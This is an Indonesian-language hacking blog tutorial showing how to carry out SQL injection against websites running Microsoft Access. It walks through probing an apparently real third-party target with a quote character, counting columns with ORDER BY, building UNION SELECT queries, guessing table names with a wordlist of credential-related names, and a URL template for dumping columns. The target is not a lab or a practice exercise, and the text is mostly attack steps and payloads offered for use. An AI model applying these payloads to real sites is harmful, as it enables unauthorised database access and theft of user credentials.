Pixel-Code

MS Access SQL-Injection 'BASIC'

Hellaw kembali lagi sobat pixel, ya pada kesempatan kali ini gue mau bagiin tutorial gimana sih caranya kita melakukan serangan SQL-Injection pada MS-Access, Seperti yang kalian tahu bahwa di tutorial sebelumnya kita juga membahas serangan SQL-Injection yakni pada Microsoft SQL Server buat kalian yang belum baca kalian bisa lihat di postingan kita sebelumya, Yuk langsung saja gimana step-stepnya.

Seperti biasa disini saya sudah memiliki contoh target yang akan saya gunakan sebagai contoh, Lets mari kita check terlebih dahulu dengan payload SQL-Injection yakni string (') untuk membuktikan site tersebut vulnerable terhadap serangan SQL-Injection atau tidak.
Microsoft JET Database Engine error '80040e14'

Yaps maka sudah keluar ouput errornya, Lanjut menghitung jumlah table dengan ORDER BY yaps sudah menemui output error.
Error in 13.

Lanjut maka jumlah table ada 12 langsung kita urutkan dengan UNION SELECT, Lah kok tetep error sih padahal mengurutkannya sudah benar.
Query input must contain at least one table or query.

Yaps tenang saja maka dari itu kita harus menebak nama_tablenya. And then biasana MS-Access kita harus menebak-nebak, kayak persaaan kamu susah ditebak :((

Penasaran? Mari kita coba cara simple dengan menggunakan table yang valid yaitu yakni 'id' kalian bisa menggunakan dibawah ini untuk memunculkan nama_table yang ada pada website.
Group+by+id

Nb: if there is an output that appears, you can combine it with from.
using group id

Cara kedua jika menggukan cara pertama tidak memunculkan output apa-apa kalian bisa menggunakan Burpsuite.
using Burpsuite

Gimana? cukup mudah untuk menemukan nama_table yang ada pada website target kalian, Jika kalian memiliki wordlist akan cukup bagus. Untuk simple wordlist nama_table bisa kalian check dibawah.
account
accnts
user_id
members
usrs
usr2
account
accounts
admin
admins
administrator
adminlogin
adminweb
auth
authenticate
authentication
access
articles
article
book
customer
customers
conf
config
login
logut
member
members
member_id
memberid
pwd
pwrd
pword
pass
passwd
password
store
setting
settings
username
user_name
uname
user_un
usernm
user_password
userpass
userpasswd
user_pwd
user_passwd
msysobjects
Nah sudah ketemu angkanya mari kita coba print name iseng hehe.

Nah gimana cara dumpnya kak? Dumpnya hampir sama saja kalian bisa menggunakan
fakesite.com/content.asp?id=3 union select 1,2,'nama_columns',4,5,6,7,8,9,10,11,12 from 'nama_table'

Nb: You can guess for the column names, or use the wordlist

Berhubung karena table user nggak ketemu jadi bingung apa yang mau di dump hehe, Oke mungkin cukup sekian tutorial kali ini, Jika tidak bisa di mengerti kalian bisa comment, dont forget too share and see you next time byee~ 

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel